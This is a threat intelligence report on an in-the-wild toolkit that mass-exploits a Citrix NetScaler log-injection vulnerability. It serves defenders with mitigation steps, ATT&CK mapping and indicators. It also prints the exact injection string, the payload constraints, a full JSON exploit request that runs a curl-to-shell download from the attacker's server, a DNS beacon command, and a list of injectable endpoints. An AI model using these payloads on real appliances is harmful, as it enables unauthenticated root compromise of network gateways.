Get Your Free Report
Start for Free
SOCRadar® Cyber Intelligence Inc. | NetScaler C2: A Massive CVE-2026-88771 Exploitation Operation
Oct 07, 2026
13 Mins Read
Moon
Summarize with:

NetScaler C2: A Massive CVE-2026-88771 Exploitation Operation

On September 27, 2026, Citrix released a security bulletin regarding multiple vulnerabilities in Citrix NetScaler ADC and Citrix NetScaler Gateway. One of them was CVE-2026-88771 (CVSSv4: 9.5), an improper input validation vulnerability exploited in the wild that allows an unauthenticated attacker to execute arbitrary commands.

SOCRadar’s Threat Research Unit identified an autonomous C2 framework (NetScaler C2) designed to identify exposed NetScaler devices at scale, fingerprint their versions, exploit CVE-2026-88771 and deploy a lightweight polling agent to request and execute operator commands. Code artifacts suggest a Chinese-speaking threat actor origin and AI usage for tool development.

Details of CVE-2026-88771 (SOCRadar Vulnerability Intelligence)

Details of CVE-2026-88771 (SOCRadar Vulnerability Intelligence)

Key Points

  • CVE-2026-88771 is a log injection vulnerability in Citrix NetScaler ADC and Gateway that enables unauthenticated, remote root code execution.
  • The vulnerability arises when attacker-controlled text supplied on unauthenticated HTTP endpoints is logged and processed through a background daemon without input sanitization.
  • NetScaler C2 identifies FOFA-indexed Citrix NetScaler ADC and Gateway devices, fingerprints their versions, exploits CVE-2026-88771 and injects commands to deploy a C2 agent that polls for operator commands.
  • A single bash script launches a complete attack pipeline that cycles every 30 minutes, collecting new targets, fingerprinting them and injecting commands.
  • Injected payloads follow an HTTP attack chain of downloader scripts that ultimately fetch a lightweight C2 agent, with a DNS out-of-band beacon for appliances that have egress restrictions.
  • Code comments and UI strings are written in Simplified Chinese, indicating a Chinese-speaking threat actor with AI usage for development.

Vulnerability Exploitation Analysis

CVE-2026-88771 is a log injection vulnerability in Citrix NetScaler ADC and Gateway. It arises because attacker-controlled text (login fields, User-Agent headers) from multiple unauthenticated HTTP endpoints is written into ns.log without input sanitization. A background daemon (admautoregd) later processes this log file using a chain of shell utilities that allow arbitrary command injection.

Specifically, admautoregd performs the following processing, according to the exploit code:

grep(pitboss.*PPE.*unexpectedly died) → sed(after the last NSPPE, remove parentheses) → awk($1-$2) → find /var/core -name ${TOKEN}* -print | tail -1

The trigger condition requires a log line matching pitboss.*PPE.*unexpectedly died. Since the username field is logged on failed authentication, the attacker controls the entire content between the magic prefix and suffix, so a malicious command can be inserted: pitboss NSPPE-00;<CMD>;# unexpectedly died. The daemon’s processing splits on ; and executes <CMD> as root. The injection payload has prerequisites: it must not include parentheses, spaces (replaced with ${IFS}), ? and & special characters, and it must be smaller than 93 bytes because of the 128-byte username field limit.

Exploit code comments also mention that admautoregd operates on a 24-hour cycle or is triggered by appliance reboots. This means injected payloads may have a delayed execution window of up to 24 hours from the time of injection.

CVE-2026-88771 exploitation chain

CVE-2026-88771 exploitation chain

admautoregd log processing that enables command injection

admautoregd log processing that enables command injection

NetScaler C2

SOCRadar identified in the wild a CVE-2026-88771 exploitation kit along with a custom C2 panel for mass exploitation. The toolkit, named NetScaler C2, consists of four files forming a modular, pipeline-oriented architecture. Each module has a single responsibility and outputs structured files consumed by the next stage.

Autonomous Attack Pipeline

The framework is fully autonomous. Every component is launched and chained through a bash script named run.sh, which acts as the Tmux-based orchestrator. It manages three concurrent sessions: the C2 listener (c2_server.py), the exploitation pipeline loop (targets.py → probe.py → exploit.py → pollctl.py) with 30-minute rounds, and monitoring of heartbeats from compromised devices.

Excerpt from run.sh

Excerpt from run.sh

NetScaler C2's attack pipeline

NetScaler C2’s attack pipeline

targets.py: FOFA Mass Reconnaissance

This script runs first and finds exposed Citrix NetScaler ADC and Gateway hosts. The operators use 12 FOFA searches with a maximum of 10,000 results each, combining titles, headers, bodies, certificates and common ports. It saves the results in deduplicated lists of {IP:PORT} entries, filtering out honeypots and AWS IP ranges using the official ip-ranges.json API.

With 12 FOFA queries and 10,000 results each, a single reconnaissance run may enumerate up to 120,000 candidate NetScaler hosts. For context, Shadowserver tracks approximately 23,000 IP addresses with NetScaler fingerprints exposed on the internet.

NetScaler C2's FOFA searches

NetScaler C2’s FOFA searches

probe.py: Fingerprint and Version Extraction

This component verifies the hosts acquired from FOFA and confirms their version and vulnerability to CVE-2026-88771. It probes the host to confirm it is reachable (HTTP/HTTPS), extracts Citrix NetScaler ADC and Gateway characteristics (title patterns, response headers, body and path responses) and confirms the version by extracting the build number via regex from nsversion, the Set-Cookie NSC_ value, and page comments in /vpn/index.html.

The script looks for affected versions prior to 13.1-64.23 / 13.1-37.279 / 14.1-73.37 and saves the affected hosts into a file. The operator used 48 workers for version probing, which means it can process thousands of targets per hour. This framework is designed for mass exploitation, not targeted intrusion.

exploit.py: CVE-2026-88771 Log Injection

This is the core exploitation engine. It receives the probed and confirmed affected hosts and exploits CVE-2026-88771. For each confirmed host, it performs two injection attempts with the two payload variants (HTTP agent bootstrap and DNS OOB fallback) across 11 HTTP endpoints simultaneously, covering JSON-body, form-encoded paths and User-Agent headers.

The payloads are built with the prefix pitboss NSPPE-00;, the injected commands (curl${IFS}-sk${IFS}45.143.130[.]195:8899/s/<bid>|sh and nslookup${IFS}<bid>.p1.oob.45.143.130[.]195) and the suffix ;# unexpectedly died. A sample form submission to an endpoint is:

{“login”:{“username”:”pitboss NSPPE-00;curl${IFS}-sk${IFS}45.143.130[.]195:8899/s/<bid>|sh;# unexpectedly died”,”password”:”x”}}

Each endpoint is attempted with multiple field-name variations to maximize logging coverage across firmware versions. For all successful log injections (not an HTTP 404), the tool builds a list of the injected hosts. For exploitation to succeed, the operator must wait for the admautoregd daemon to process them (up to 24 hours). On success, the C2 listener handles the agents’ beaconing.

Payload injection code for CVE-2026-88771 exploitation

Payload injection code for CVE-2026-88771 exploitation

CVE-2026-88771 log injection endpoints:

Endpoint Name HTTP Request HTTP URL Payload Type
nitro_login POST /nitro/v1/config/login Body (username, password) – JSON
nitro_action POST /nitro/v1/config/login?action=login Body (username, password) – JSON
aaa_doauth POST /nf/auth/doAuthentication.do Body (username, password) – Form
aaa_reqs POST /nf/auth/getAuthenticationRequirements.do Body (username, password) – Form
vpn_form POST /vpn/index.html Body (username, password) – Form
logon_form POST /logon/LogonPoint/index.html Body (username, password) – Form
cgi_login POST /cgi/login Body (username, password) – Form
pu_doauth POST /p/u/doAuthentication.do Body (username, password) – Form
ua_vpn GET /vpn/index.html User-Agent
ua_nitro GET /nitro/v1/config/login User-Agent
ua_root GET / User-Agent

c2_server.py: Dual-Protocol C2 Listener

This component is a dual-protocol C2 listener. It is launched first, before the attack pipeline, and activates two services for payload serving and C2 interaction. HTTP on port 8899 handles C2 callback registration, command polling, result collection and agent staging. DNS on port 53 handles OOB beacons as confirmation of successful exploitation.

HTTP C2 Agent

NetScaler C2 injects the command curl -sk 45.143.130[.]195:8899/s/<bid>|sh. The bid is the ID of the compromised appliance, used to distinguish victims; it is the first 8 characters of the MD5 hash of the IP:PORT entry of the victim Citrix host. Fetching this URL returns a bootstrap script from the C2, which uses curl (or wget as a fallback) to fetch a C2 agent from hxxp://45.143.130[.]195:8899/a/<bid>, saves it at /tmp/.nsagent and executes it in the background.

NetScaler C2's bootstrap script contents

NetScaler C2’s bootstrap script contents

The next stage is the agent. It gathers the hostname and username of the device, hex-encodes them and registers the agent via /p/<bid>?h={hex_hostname}&u={hex_username}&src=agent. The agent then polls the C2 endpoint /c/<bid> every 20 seconds for commands, and returns results, again hex-encoded, via /r/<bid>?d={hex_data}.

NetScaler C2's agent contents

NetScaler C2’s agent contents

DNS OOB Beacons

NetScaler C2 also injects a DNS OOB method during each exploitation attempt. This is not designed for full C2 communication; it only confirms successful exploitation and signals that C2 cannot be established because of missing HTTP capabilities (i.e. blocked egress or unavailable curl and wget utilities). It injects nslookup <bid>.p1.oob.45.143.130[.]195. The C2 registers the victim IP and sends back a NOERROR empty DNS response so nslookup exits cleanly.

pollctl.py: C2 Bot Management

Finally, pollctl.py is the operator’s control interface. It provides bot reporting (–report), an interactive per-device shell (–shell, connecting back every 30 seconds for command polling), command broadcasting to all (–exec-all) or specific agents (/api/cmd?bid=<bid>&cmd=<command>), and session history (/api/raw?bid={bid}).

Sample reconstructed NetScaler report panel with dummy data (no active NetScaler C2 instance could be retrieved)

Sample reconstructed NetScaler report panel with dummy data (no active NetScaler C2 instance could be retrieved)

Conclusion

NetScaler C2 demonstrates how threat actors can easily operationalize and automate exploits at scale using AI. CVE-2026-88771 was disclosed and confirmed exploited in the wild on September 27, with the first technical write-up released on September 28, 2026. NetScaler C2, identified on October 1, already had the capability to autonomously discover FOFA-indexed Citrix NetScaler ADC and Gateway appliances, verify affected builds, distribute injection attempts across multiple unauthenticated attack surfaces, and infect them with a lightweight polling-based C2. While SOCRadar did not recover an active C2 instance and therefore could not independently quantify the number of confirmed compromised appliances, the framework’s architecture shows clear intent and capability to exploit vulnerable NetScaler infrastructure at scale.

Mitigation

Confirm Exposure

Citrix’s security bulletin states that all customer-managed NetScaler ADC and NetScaler Gateway deployments are affected, including those with the default configuration. The following versions are affected:

  • Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1 before 14.1-73.37
  • Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1 before 13.1-64.23
  • Citrix NetScaler ADC FIPS before 14.1-73.37 FIPS
  • Citrix NetScaler ADC FIPS and NDcPP before 13.1-37.279

Isolate Vulnerable Systems and Hunt for Compromise Indicators

Vulnerable systems should be isolated from the network, and security teams should hunt for NetScaler C2 compromise indicators:

  • Search all ns.log archives for the trigger strings pitboss NSPPE-00;, /s/<bid>|sh and ;# unexpectedly died, the C2 IP 45.143.130[.]195, and check for outbound connections within 24 hours of any log match
  • Inspect /tmp/ for hidden files or shell scripts (for example .nsagent)
  • Review running processes for unexpected shells
  • Review network and proxy logs for communication towards /s/<bid>, /a/<bid>, /p/<bid>?h=<hex_hostname>&u=<hex_username>&src=agent, /c/<bid> and /r/<bid>?d=<hex>
  • If compromise indicators are identified, preserve forensic evidence, contain the affected appliance, eradicate malicious artifacts and upgrade to a fixed version

Update to Fixed Versions

Citrix urges affected organizations to upgrade to fixed versions:

  • Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later
  • Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
  • Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
  • Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP

Organizations racing to patch should also monitor active enforcement timelines, such as CISA’s order for federal agencies to patch exploited Citrix flaws.

MITRE ATT&CK TTPs

Tactic Technique ID Technique Name Description
Reconnaissance T1596.005 Search Open Technical Databases: Scan Databases NetScaler C2 identified Citrix NetScaler ADC and Gateway hosts through FOFA queries.
Initial Access T1190 Exploit Public-Facing Application NetScaler C2 exploits CVE-2026-88771 log injection via unauthenticated HTTP endpoints.
Execution T1059.004 Command and Scripting Interpreter: Unix Shell NetScaler C2 injects bash commands executed via the admautoregd daemon.
Defense Evasion T1036.005 Masquerading: Match Legitimate Resource Name or Location The NetScaler C2 agent is stored as /tmp/.nsagent.
Persistence T1543 Create or Modify System Process The agent is daemonized in the background and survives reboot by being re-injected via admautoregd.
Exfiltration T1041 Exfiltration Over C2 Channel The agent returns command results to the C2 in hex-encoded format via GET /r/<bid>?d=<hex>.
Command and Control T1132.001 Data Encoding: Standard Encoding The agent hex-encodes command results before returning them to the C2.
Command and Control T1105 Ingress Tool Transfer The bootstrap script downloads the agent binary from /a/<bid> to /tmp/.nsagent.
Command and Control T1071.001 Application Layer Protocol: Web Protocols The agent uses HTTP to poll for commands from /c/<bid>.
Command and Control T1071.004 Application Layer Protocol: DNS The agent includes a DNS OOB fallback when HTTP is unavailable or curl/wget are absent.

Indicators of Compromise

Network and Host

Type Indicator Description
IP Address 45.143.130[.]195 NetScaler C2, ports 8899 and 53
SHA256 8588d11874ab52a1637953dc5538984647023d00b529f695fbd0e40cf8e5e852 run.sh
SHA256 4992f575f3f1fc448cf54a4a0ce13cf6548790777abe0af1f935663498ea5639 targets.py
SHA256 69a34c591eaaa2cbecaeed10c303b8dcf04c846b8408491da5452b9cfc93f686 probe.py
SHA256 a3e26053975daa0a12a4848ce9533e5c439617cd7f69851347be2061999b4cd4 exploit.py
SHA256 a9142989d912098856e58f2c74c2266e39150d50bc59722f915dade1ddfddf4a c2_server.py
SHA256 f9e06d412dee96d98db4d4588f0012af859cc11caaae3e130697f282447cf07f pollctl.py

Behavioral

Type Indicator Description
HTTP Path /s/<bid> Bootstrap script delivery, bid = MD5(ip:port){8 chars}
HTTP Path /a/<bid> Agent binary delivery
HTTP Path /p/<bid>?h=<hex_hostname>&u=<hex_username>&src=agent Initial C2 agent registration
HTTP Path /c/<bid> Command polling endpoint
HTTP Path /r/<bid>?d=<hex> Command result exfiltration (hex-encoded)
Log Content pitboss NSPPE-00; Injection trigger string in ns.log / network activity
Log Content /s/<bid>|sh Injection trigger string in ns.log / network activity
Log Content ;# unexpectedly died Injection trigger string in ns.log / network activity
File Name /tmp/.nsagent Dropped agent binary and background daemon

Frequently Asked Questions

What is CVE-2026-88771?

CVE-2026-88771 (CVSSv4 9.5) is an improper input validation, or log injection, vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway. Attacker-controlled text supplied to unauthenticated HTTP endpoints is written to ns.log and later processed by the admautoregd daemon without sanitization, which lets an unauthenticated attacker execute arbitrary commands as root. Citrix disclosed it on September 27, 2026, and it was confirmed exploited in the wild.

What is NetScaler C2?

NetScaler C2 is an autonomous command-and-control framework SOCRadar identified in the wild that weaponizes CVE-2026-88771 for mass exploitation. It is built from four modular scripts that find FOFA-indexed NetScaler devices, fingerprint their versions, inject the exploit across multiple endpoints, and deploy a lightweight agent that polls for operator commands. Code comments and UI strings in Simplified Chinese point to a Chinese-speaking threat actor.

Is my NetScaler device affected?

All customer-managed NetScaler ADC and Gateway deployments on versions prior to 14.1-73.37, 13.1-64.23, 13.1-FIPS/NDcPP 13.1-37.279, and 14.1-FIPS 14.1-73.37 FIPS are affected, including those running the default configuration. If your appliance is internet-facing and unpatched, treat it as at risk and prioritize the checks below.

How do I know if I have been compromised?

Search your ns.log archives for the injection triggers pitboss NSPPE-00;, /s/<bid>|sh and ;# unexpectedly died, and for the C2 IP 45.143.130[.]195. Inspect /tmp/ for the dropped agent /tmp/.nsagent, review running processes for unexpected shells, and check network and proxy logs for the C2 URL paths /s/, /a/, /p/, /c/ and /r/. Because the admautoregd daemon can delay execution by up to 24 hours, check for outbound connections in the window after any log match.

What should I do if my device is vulnerable or compromised?

Isolate vulnerable systems, then upgrade to a fixed version (14.1-73.37, 13.1-64.23, or the corresponding FIPS and NDcPP releases). If you find compromise indicators, preserve forensic evidence, contain the appliance, eradicate malicious artifacts, and rebuild or upgrade before returning it to service. Restrict management interfaces from the public internet to reduce future exposure.

How is AI involved in this operation?

Code artifacts in the toolkit indicate the operators used AI for tool development. The wider pattern, a small operator automating discovery, exploitation and C2 across tens of thousands of candidate hosts, reflects how AI lowers the effort needed to run mass-exploitation campaigns rather than any novel malware. The risk here is scale and automation, not sophistication.

Which NetScaler versions are affected, and where are the fixes?

Citrix disclosed CVE-2026-88771 and CVE-2026-88772 on September 27, 2026, alongside six other NetScaler ADC and Gateway vulnerabilities. For affected versions, fixed builds, and remediation guidance, see our earlier coverage.